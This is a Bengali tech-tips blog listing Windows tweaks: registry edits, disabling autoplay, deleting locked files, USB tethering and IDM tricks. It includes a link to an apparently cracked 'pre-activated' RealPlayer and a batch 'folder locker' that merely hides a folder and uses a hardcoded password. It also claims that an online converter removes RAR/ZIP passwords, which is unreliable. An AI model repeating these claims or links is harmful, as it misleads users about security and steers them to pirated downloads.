    3. এখন আপনাকে EXPLORER.EXE প্রোগ্রামটি বন্ধ করতে হবে। এটি করার সঠিক উপায় হচ্ছে: start menu থেকে Shut Down সিলেক্ট করুন > CTRL+SHIFT+ALT চেপে ধরে CANCEL button এ ক্লিক করুন। EXPLORER.EXE প্রোগ্রামটি বন্ধহয়ে যাবে।
    4. এবার ধাপ 1 এ খোলা Command Prompt এ যান > directory change করে Undeletable ফাইল টি যেখানে রয়েছে সেখানে যান > DEL স্পেস filename(যে ফাইলটি ডিলিট করতে চান) লিখে Enter চাপুন।
    5. এবার Task Manager এ ফিরে যান click File, New Task এবং EXPLORER.EXE চাপুন।
    6.  Task Manager বন্ধ করুন.
    Read more

    ছুটি নিন.. PC একাই Refresh হবে..

    আপনার কম্পিউটার অটো রিফ্রেশ সিস্টেম চালু করুন-



      প্রথমে start এ ক্লিক করুন।।এবার Run এ ক্লিক করুন।।টাইপ করুন regedit এবার Enter বাটন প্রেস করুন...Registry Editor নামে এক টা Window আসবে...এবার ক্লিক করুন HKEY-LOCAL-MACHINE এ।।এবার ক্লিক করুন SYSTEM এ।।এবার ক্লিক করুন CurrentControlSet এ।।এবার Control থেকে Update এ ক্লিক করুন।।এবার পাশের বক্সে UpdateMode এ ক্লিক করুন।।একটি Window নতুন আসবে যেখানে 1 লেখা থাকবে.. 1 মুছে 0 লিখে OK ক্লিক করুন...computer রি স্টার্ট করে দেখুন অটো রেফ্রেশ...
    Read more

    কোন সফটওয়্যার ছাড়াই ফোল্ডারকে পাসওয়ার্ড দিয়ে প্রটেক্ট করুন

    এতে অনেক অসুবিধাও হয়েছে । ফুলভার্সন লক ফোল্ডার খুজতে খুজতে জান শেষ । আবার কিছু পেলেও দেখা যায় ভাইরাসে ভরা সাথে ১০০ সমস্যা । আর কোন সমস্যা এই ব্যাপারে হবে না আশা রাখি ।কারন আজ আমি দেখাবো কি করে কোন সফটওয়্যার ছাড়া ফোল্ডার পাসওয়ার্ড দিয়ে লক করবেন ।




    ১) প্রথমে আপনার নোটপেড ওপেন করুন ।
    ২) এখন কোডটি কপি করে নোটপেড এ পেস্ট করুন
    cls
    @ECHO OFF
    title Folder Locker
    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
    if NOT EXIST Locker goto MDLOCKER
    :CONFIRM
    echo Are you sure u want to Lock the folder(Y/N)
    set/p "cho=>"
    if %cho%==Y goto LOCK
    if %cho%==y goto LOCK
    if %cho%==n goto END
    if %cho%==N goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    echo Folder locked
    pause
    goto End
    :UNLOCK
    echo Enter password to Unlock folder
    set/p "pass=>"
    if NOT %pass%==alltechbd goto FAIL
    attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
    echo Folder Unlocked successfully
    goto End
    :FAIL
    echo Invalid password
    goto end
    :MDLOCKER
    md Locker
    echo Locker created successfully
    pause
    goto End
    :End
    ৩) এখন lock.bat নামে সেভ করুন । আপনি অন্য নামেও সেভ করতে পারেন তবে নামের শেষে অবশ্যই .bat থাকতে হবে ।
    ৪) এখন lock.bat এর উপর ডাবল ক্লিক করুন । ক্লিক করলে lock নামে একটি ফোল্ডার আসবে । এখন আপনি যা লুকাতে চান তা এই lock ফোল্ডারে রাখুন ।
    ৫) এখন আবার lock.bat এর উপর ডাবল ক্লিক করুন । একটি কমান্ড বন্স আসবে এবং Y লিখে ইন্টার চাপুন ।
    ৬) যখন আপনি আনলক করতে যাবেন ,তখন lock.bat এর উপর ডাবল ক্লিক করুন পাসওয়ার্ড চাইলে alltechbd দিন । আপনি চাইলে পাসওয়ার্ড পরিবর্তন করতে পারেন । পরিবর্তন করার জন্য কোড নোটপেডে পেস্ট করার সময় alltechbd এর জায়গায় আপনার পাসওয়ার্ড দিন ।
    ব্যাস আপনার কাজ শেষ।
    Read more

    কম্পিউটারে সরাসরি Youtube এর ভিডিও দেখুন মাত্র ২০-২৫ কেবি স্পীডে কোন সমস্যা ছারাই।

    Youtube থেকে ভিডিও দেখার শখ কার নাই বলেন? কিন্ত সমস্যা একটাই নেট স্পীড কম থাকার কারনে আমাদের এই শখ সপ্নেই থেকে যায়। ঠিক মত Video Streming হয় না নেট স্পীড কম থাকার কারনে। এই কম নেট স্পীডে যদি কোন সমস্যা ছাড়া ভিডিও দেখতে পারেন তাহলে কেমন হবে বলেন তো? হাঁ এই কাজ টি সম্ভব!
    আসুন দেখে নেই কিভাবে ইউটিউব থেকে ২০-২৫ কেবি স্পীডে কোন সমস্যা ছারাই সরাসরি ভিডিও দেখা যায় দেখে নেই। নিচে আপনাদের সুবিধার জন্য পুরো বিষয়টি চিত্রসহ তুলে ধরা হল।
     
     
     
     

    প্রথমে আপনার যা দরকার হবেঃ


     Net Connection ( Speed 15-25 এর মধ্যে হলেই চলবে )
     Vlc Media Player অথবা Real Player
    ***নিচে Vlc Player দিয়ে প্রক্রিয়াটি দেখানো হলঃ

     আসুন প্রক্রিয়াটি বিস্তারিত দেখে নেইঃ

    ১. প্রথমে এইখান থেকে Vlc Media player ডাউনলোড করে নিন,  অথবা ডাউনলোড করুন

    Real Player Superpass Fully Pre-Activated

    http://www.mediafire.com/?lw5nq2mfu2o ( যাদের নেই শুধু তাদের জন্য ) ।

    ২. এখন আপনার ব্রাউজার দিয়ে m.youtube.com এই ঠিকানায় প্রবেশ করুন।

    ৩. এখন আপনার পছন্দ অনুযায়ি যেকোনো ভিডিও Search দিন ( নিচের চিত্রের মত )।

    ৪. এখন আপনি যেই ভিডিওটা Play করতে চান তার উপর মাউসের Cursor রাখুন ( নিচের চিত্রের মত )।

     ৫. এখন উপরের চিত্রের মার্ক করা যায়গায় মাউস এর রাইট বাটন ক্লিক করে Copy Link Location এ ক্লিক করুন ( নিচের চিত্রের মত )।

     

     ৬. এখন আপনার Vlc Media Player ওপেন করুন ।

    ৭. এখন আপনার Vlc Media Player এর উপর মাউস এর কার্সর রেখে Keyboard থেকে Ctrl+V চাপুন। তাহলে নিচের চিত্রের মত একটি Dialog Box আসবে ।

    ৮. এখন Dialog Box এ Enter URL here.... এইখানে মাউসের কার্সর রেখে আবার Ctrl+V চেপে Play বাটনে ক্লিক করুন । তাহলে দেখবেন নিচের চিত্রের মত ভিডিও চলতেছে কোন সমস্যা ছারাই।

    **** উপরের ৭ এবং ৮ নম্বর কাজটি আপনি Manually ও করতে পারেন। এজন্য Vlc player open করে প্লেয়ার এর মেনুবার থেকে প্রথমে Media তারপর Advance Open File তারপর Network এ ক্লিক করে আপনার কপি করা ইউটিউব এর ভিডিও Url টি Past করে Play বাটনে ক্লিক করুন।
    আজ এই পর্যন্তই আশা করি ভাল লেগেছে।
    Read more

    RAR ,ZIP ফাইলের পাসওয়ার্ড রিমুভ করুন অনলাইনে !!

    RAR , ZIP এর পাসওয়ার্ড ভুলে গেলে কি করম ভোগান্তি হয় , সেটা সবারই জানা । এক্ষেত্রে আমরা বিভিন্ন  PASSWORD RECOVERY সফটওয়ার ব্যবহার করি । কিন্তু এগুলোর পারফরমেন্স বড়ই হাস্যকর , প্রথমত এটি সামান্য কঠিন পাসওয়ার্ড হলে কিছুতেই তা ভাঙতে পারে না , আর যদি কোন ভাবে  ভাঙে তবে ১০ থেকে ১০৮ ঘন্টা সময় নেয় , কিংবা আরো বেশি  ।



    কিন্তু আজকে আমি আপনাদের এমন একটি ট্রিক দেখবো যাতে আপনি মুহুর্তে RAR , ZIP ফাইলের পাসওয়ার্ড ভাঙতে পারবেন । তবে এখান ফাইলটা আপলোড করতে হয় তাই এটি আপনার নেটের স্পিডের ওপর নির্ভর করে ।
    তো এবার শুরু করা যাক ।
    ১।প্রথমে এখানে যান   http://archive.online-convert.com/convert-to-zip
    ২।CHOOSE FILE ক্লিক করুন এবং আপনার কাংক্ষিত RAR , ZIP ফাইলটি SELECT করুন।
    ৩।এবার CONVERT FILE ক্লিক করুন।
    ৪।আপনার ফাইলটি এখন আপলোড হবে ,তাই কিছুক্ষণ অপেক্ষা করুন।
    ৫।আপলোড শেষ হলে একটি পেজ আসবে এবং আপনার ফাইলটি AUTOMATICLY ডাউনলোড শুরু হবে । খেয়াল করুন আপনার ফাইলেন সাইজও কিছুটা কমে যাবে।
    ৬।ডাউনলোড শেষ হলে ফাইলটি অপেন করে EXTRACT করার চেষ্টা করুন এবং দেখুন  কোন পাসওয়ার্ড চাবে না সুন্দর মতো EXTRACT হবে।
    আজ এই পর্যন্তই ।
    Read more

    IDM এ incomplite ডাউনলোড ফাইল বের করে আনুন।

    মনে করুন আপনি একটা ভিডিও ফাইল ডাউনলোড দেওয়া শুরু করেছেন কিন্তু কোন কারণবশত যদি ভিডিওটা ৮০% হওয়ার পর Error দেখায় তাহলে যেকোন ব্যক্তির মেজাজ খারাপ হওয়া স্বাভাবিক । তবে সবচেয়ে বেশি খারাপ লাগে যখন যদি ভিডিওটা আর Resume করা না যায় ।
    তখন আপনার সামনে দুটি পথ থাকেঃ
    1. আবার ভিডিওটা প্রথম থেকে ডাউনলোড করা
    2. ভিডিওটার কথা ভুলে যাওয়া ।
    আপনি কি জানেন যে ইচ্ছা করলেই আপনি যতটুকু ভিডিও ডাউনলোড করেছিলেন ততটুকু ভিডিওই দেখতে পারবেন । বিস্মিত হলেন ? বিস্মিত হলেও এটা সত্যি ।



    এখন চলুন দেখি কিভাবে আমরা যতটুকু ভিডিও ডাউনলোড হয়েছিল ঠিক ততটুকু ভিডিওই দেখতে পারব । যারা জানেন ভালো কথা, কিন্তু যারা জানেন না তারা নিচের পদ্ধতিগুলো ভালো করে অনুসরণ করুন ।
    1. RUN Dialoge Box ওপেন করুন । [ Win Logo Button + R চাপলেই RUN Dialoge Box ওপেন
    হবে । সেখানে %appdata% লিখে Enter চাপুন ।
    2. এবার যে Window ওপেন হবে সেখান থেকে IDM নামক ফোল্ডারটি খুজে ওপেন করুন ।
    3. তারপর DwnlData পরিশেষে Administrator (আপনার পিসির ইউজার নেম দিয়ে তৈরী হওয়া ফোল্ডার, যেমন আমার ইউজার নেম Santo) ফোল্ডারটি ওপেন করুন ।
    4. এই ধাপে আপনাকে নিজের বুদ্ধি খাটাতে হবে । এখানে আপনি আপনার IDM দিয়ে আংশিক ডাউনলোড হওয়া প্রত্যেকটি ফাইলের জন্য একটি করে ফোল্ডার পাবেন । IDM এর ডাউনলোড তাহলে এখানে আপনি GOOGLE বা YOUTUBE অথবা ডাউনলোড করা ফাইলের নামে একটা ফোল্ডার
    লিষ্ট থেকে আপনি আংশিক ডাউনলোড হওয়া ফাইলগুলো ডিলেট করে দিলেও এখানে সব ফাইলগুলোর ডাটা সঞ্চিত থাকে ।
    5. আপনার কাঙ্খিত ফোল্ডারটি খুজে সেটা ওপেন করলে সেখানে Extension ছাড়া অনেকগুলো ফাইল দেখতে পাবেন । সেখান থেকে Extension ছাড়া প্রথম ফাইলটি ডাবল ক্লিক করে ওপেন করুন । Windows আপনার কাছে কোন প্রোগ্রাম দিয়ে ফাইলটি ওপেন করতে হবে তার পারমিশন চাইবে । এখানে যেকোন ভালো একটা প্লেয়ার সিলেক্ট করে OK করুন ।
    ব্যাস আপনার কাজ শেষ । সবকিছু ঠিকঠাক করে থাকলে আপনার কাঙ্খিত ভিডিও আপনার সামনে
    হাজির হবে ।
    (বিঃদ্রঃ সম্পূর্ণ প্রক্রিয়াটি Windows 7 এ করা । অপারেটিং সিস্টেম ভেদে কিছুটা ভিন্ন্ হওয়া স্বাভাবিক ।)
    আর একটা কথা না বললেই নয় যে, একই প্রক্রিয়ায় আপনারা আংশিক ডাউনলোড হওয়া অডিও ফাইলও Play করে শুনতে পারবেন ।
    Read more

    জেনে নিন কি ভাবে আপনার পিসির ওয়েলকাম স্ক্রীন পরিবর্তন করবেন

    আশা করি সবাই ভালো আছেন। আজকে কি নিয়ে আলোচনা করবো তা হয়তো নাম দেখেই বুঝে গেছেন। আমরা যারা পিসি চালাই তাদের বেশির ভাগ মানুষেই উইন্ডোজ চালাই।



    তাই সবাই এই উইন্ডোজ এর সাথে ভালো ভাবে পরিচিত। আমাদের পিসি যখন ওপেন করি তখন উইন্ডোজ এর ডিফল্ট টেক্সট দেখতে পাই ওয়েলকাম। আপনি চাইলে এটি পরিবর্তন করে আপনার নাম বা যেকোনো কিছু দিতে পারেন। কি করে পরিবর্তন করবেন আজকে সেটাই নিয়ে আলোচনা করবো।
    প্রথমে স্টার্ট মেনু থেকে রান এ জান। এরপর Regedit টাইপ করে এন্টার প্রেস করুন।
    এবার HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows NT > CurrentVersion > Winlogon এ ক্লিক করুন। এবার ডান দিক থেকে LegalNoticeCaption এ ডাবল ক্লিক করুন। মেসেজ এর Caption যা হবে তা টাইপ করুন।
    এবার ডান দিক থেকে LegalNoticeText এ ডাবল ক্লিক করুন। আপনি কি মেসেজ দিতে চান তা এর মধ্যে টাইপ করুন।
    Read more

    ভাইরাসযুক্ত pendrive পিছি কানেক্ট করলেও autorun হবে না

    অনেক সময় দেখা যায় যে আমরা কম্পিউটার এ pendrive বা memory card লাগালে অটোমেটিক pendrive ওপেন হয়ে যায়। এতে করে pendrive এ যদি ভাইরাস থাকে, তাহলে সেই ভাইরাস আমাদের কম্পিউটার এ ঢুকে যায়। আর আপনারা তো জানেন, কম্পিউটার এ ভাইরাস ঢুকলে কি কি সমস্যা হয়।



    আজ আমি আপনাদের সাথে একটি উপায় শেয়ার করবো, যাতে করে আপনারা এই সমস্যা থেকে চিরো মুক্তি পান। কাজের কথায় আসি। auto play প্রথমে আপনি আপনার কম্পিউটার এর start বাটন এ ক্লিক করুন। এর পর run এ ক্লিক করুন। এখানে আপনি gpedit.msc লিখে enter দিন। এবার আপনি administrative templates এ ক্লিক করুন। এবার আপনি system এ ক্লিক করুন। তারপরে turn off autoplay তে ক্লিক করুন। এখানে আপনি enable এ ক্লিক করুন এবং ডান পাশে একটি বক্স এর মধ্যে cd drive লিখা আছে তার উপর ক্লিক করে all drive সিলেক্ট করুন,এর পরে নিচে ok বাটন প্রেস করুন। এইতো কাজ শেষ। এবার শুধু কম্পিউটার টি একবার restart দিন।
    Read more

    এন্ড্রয়েড ফোন দিয়ে পিসি তে নেট চালান খুব সহজে !

    এবার আসল কথায় আসি। আমার অনেকেই নকিয়ার বিভিন্ন মডেলের ফোন দিয়ে পিসিতে নেট ইউস করি যে খানে আমাদের পিসি সুইট নামক একটা সফটওয়ার দরকার হয় কিন্তু এখন স্মারট ফোনের যুগ যার মধ্যে অ্যানড্রোয়েডের চালিত সেট গুলো অন্যতম। দামে কম হওয়া আমরা অনেকেই অ্যানড্রোয়েডের চালিত সেট ব্যবহার করি। ওনেক কোম্পানীই তাদের সেটের সাথে ড্রাইভার দেয় না ফলে আমরা ড্রাইভারের অভাবে ওনেকেই সেট দিয়ে পিসিতে নেট ব্যবহার করতে পারি না।

     তাই আমি আজ দেখাবো কি ভাবে এন্ড্রয়েড মোবাইল কে মডেম বানিয়ে পিসি থেকে ইন্টারনেট ব্যবহার করা যায় তার পদ্ধতি।
    যা যা লাগবে।
    1. 1টি এন্ড্রয়েড ডিভাইস
    2. ডাটা ক্যবল
    3. নেটি এ্যাকটিভেটেড সিম যে কোন অপারেটর
    4. পিসি [উনডোস সেভেন/এইট চালিত]

    এন্ড্রয়েড মোবাইল কে মডেম বানিয়ে পিসি থেকে ইন্টারনেট ব্যবহার করার পদ্ধতি।
    1. USB Debugging Mode অন করুন। USB Debugging Mode অন করতে নিচের কমান্ডটি অনুসরন করুন।
    Home/App drawer>Settings>Applications>Development> USB Debugging (Select) [USB Debugging এর ফাকা বক্সে টিক চিহ্ন দিয়ে সেলেক্ট করুন।]
    2. মোবাইলের ডাটা কানকশন অরথাত সেটের নেট কানেকশন অন করুন (যদি ডুয়েল সিমের সেট হয় তবে যে সিমে নেটি এ্যাকটিভ করা সেই সিম দিয়ে নেট কানেক্ট করবেন) মোবাইলের নেট কানকশন অন করতে নিচের কমান্ডটি অনুসরন করুন
    Home/App drawer>Settings>SIM Management>Data Connection>Select SIM [যদি ডুয়েল সিমের সেট হয় তবে যে সিমে নেটি এ্যাকটিভ করা সেই সিম দিয়ে নেট কানেক্ট করবেন।]
    3. আপনার ডিভাইসকে ডাটা ক্যবলের মাধ্যমে পিসির সাথে কানেক্ট করুন।
    4. USB Tethering অন করুন, অন করতে নিচের কমান্ড প্রয়োগ করুন।
    Home/App drawer>Settings>Wireless & Networks>Tethering & portable hotspot>USB tethering (Select) [USB tethering এর ফাকা বক্সে টিক চিহ্ন দিয়ে সেলেক্ট করুন।
    5. কিছুক্ষন অপেক্ষা করুন (30 সে.) আপনার পিসি এখন নেট ব্যবহারের জন্য প্রস্তুত। আপনি এখন নেট ব্যবহার করতে পারবেন আপনার পিসি থেকেই।


    ...ধন্যবাদ।
    Read more

    মিউজিক যুক্ত করুণ Internet Download Manager এ

    আমরা যারা কম বেশি ইন্টারনেটএর সাথে যুক্ত আছি তারা অধিকাংশই ডাউনলোডের জন্য Internet Download Manager ব্যবহার করি। আর এর সাথে যদি মিউজিক যুক্ত করা যায় তা হলে কেমন হয়? আমরা আজ দেখব কি ভাবে Internet  Download Manager এ মিউজিক যুক্ত করা যায়।
    এর জন্য প্রথমে Internet Download Manager ওপেন করে Download মেন্যু থেকে Option এ যেতে হবে।


    তার পর Sound ট্যাবে যেতে হবে।

    এখানে একটি বক্সে চার(৪)টি অপশন দেখা যাবে এখান থেকে আমাদের পছন্দ মত একিটি অপশনে টিক চিহ্ন দেব অথবা কার্সর দ্বারা ক্লিক করব এবং আমাদের পছন্দ মত মিউজিক ব্রাউস করে দেব।

    তবে ফাইলটি অবশ্যই wavফরম্যাটের হতে হবে। ব্রাউস করার পর Ok করতে হবে। আমরা যেটিতে টিক দিয়েছি সেটি সম্পূর্ণ হলে মিউজিক বাজবে।
    Read more